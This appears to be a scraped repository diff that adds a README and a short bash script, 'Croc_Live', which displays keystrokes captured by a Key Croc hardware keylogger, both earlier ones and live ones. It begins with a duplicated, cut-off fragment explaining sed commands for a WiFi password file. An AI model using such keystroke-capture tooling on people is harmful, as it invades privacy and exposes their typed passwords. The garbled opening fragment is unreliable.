x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space. x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space.
10{G;s/\n(\S+).*/ \1/} - 10{G;s/\n(\S+).*/ \1/}
10{..} executes the commands between the ellipses on the tenth line of config.txt. 10{..} executes the commands between the ellipses on the tenth line of config.txt.
G append the contents of hold space to the pattern space using a newline as a separator. G append the contents of hold space to the pattern space using a newline as a separator.
s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column. s/\n(\S+).*/ \1/ match on the appended hold space and replace it by a space and the first column.
11{G;s/\n\S+//} - 11{G;s/\n\S+//}
11{..} executes the commands between the ellipses on the eleventh line of config.txt. 11{..} executes the commands between the ellipses on the eleventh line of config.txt.
G append the contents of hold space to the pattern space using a newline as a separator. G append the contents of hold space to the pattern space using a newline as a separator.

29
payloads/library/general/Croc_Live/README.md Normal file
View File

@ -0,0 +1,29 @@
# Croc_Live
Script Description: Keyboard Activity Monitor
The following script serves as a tool to monitor and display keyboard activity, showing both previous keystrokes and live keystrokes in real-time. It operates in the terminal environment and relies on the presence of certain log files.
- Display Previous Keystrokes:
- The script initiates by printing a message to the terminal, indicating that the previously recorded keystrokes are about to be displayed.
- It then searches for files named "croc_char.log" within the current directory and its subdirectories.
- All found log files are concatenated and their contents are displayed, revealing the previous keystrokes recorded in those files.
- Waiting for Keyboard Activity:
- After displaying the previous keystrokes, the script enters a loop, continuously checking for the existence of the file "loot/croc_char.log".
- During this loop, it prints the message "Waiting for keyboard activity" and clears the line with each iteration. This creates an interactive waiting experience for users until keyboard activity is detected.
- Show Live Keystrokes:
- Once the file "loot/croc_char.log" is present (indicating keyboard activity has started), the script proceeds.
- A 1-second pause occurs to allow time for the system to update or log any new keyboard activity.
- The terminal screen is then cleared to prepare for the display of live keystrokes.
- A message is shown to inform users that live keystrokes will be displayed.
- The script uses the tail -f command, which continuously follows and outputs new content appended to the "loot/croc_char.log" file. This effectively presents live keystrokes in real-time.
- Usage:
Place the croc_live.sh file in keycroc tools folder.
To utilize this script, simply execute it in the terminal environment. Make sure that the required log files, specifically "croc_char.log" and "loot/croc_char.log," are available and accessible within the current directory. Simply type "bash udisk/tools/croc_live.sh" in terminal.
Please note that this script may have specific use cases, such as monitoring and capturing keyboard activity during specific sessions or tasks. Always ensure you have the necessary permissions to read and access the log files being monitored.

19
payloads/library/general/Croc_Live/croc_live.sh Normal file
View File

@ -0,0 +1,19 @@
#!/bin/bash
# Title: Croc_Live
# Description: Live keystrokes in real-time. It operates in the terminal environment ( bash udisk/tools/croc_live.sh )
# Author: spywill
# Version: 1.0
# Category: Key Croc
echo -ne "\n\nPrevious keystrokes:\n\n"
find . -type f -name "croc_char.log" -exec cat {} +
until [ -f loot/croc_char.log ]; do
echo -ne "Waiting for keyboard activity\033[0K\r"
done
sleep 1
printf '\033[H\033[2J'
echo -ne "\n\nLive keystrokes:\n\n"
tail -f loot/croc_char.log